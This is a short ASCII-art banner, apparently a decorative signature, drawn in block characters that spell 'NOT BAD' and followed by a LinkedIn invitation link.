░���▀░██████████████████▌▀▄░░░░
▀░░░█████▀▀░░░▀███████░░░▀▄░░
░░░░▐█▀░░░▐░░░░░▀████▌░░░░▀▄░
░░░░░░▌░░░▐░░░░▐░░▀▀█░░░░░░░▀
░░░░░░▐░░░░▌░░░▐░░░░░▌░░░░░░░
░╔╗║░╔═╗░═╦═░░░░░╔╗░░╔═╗░╦═╗░
░║║║░║░║░░║░░░░░░╠╩╗░╠═╣░║░║░
░║╚╝░╚═╝░░║░░░░░░╚═╝░║░║░╩═╝░invite-me: linkedin.com/in/eliastouguinho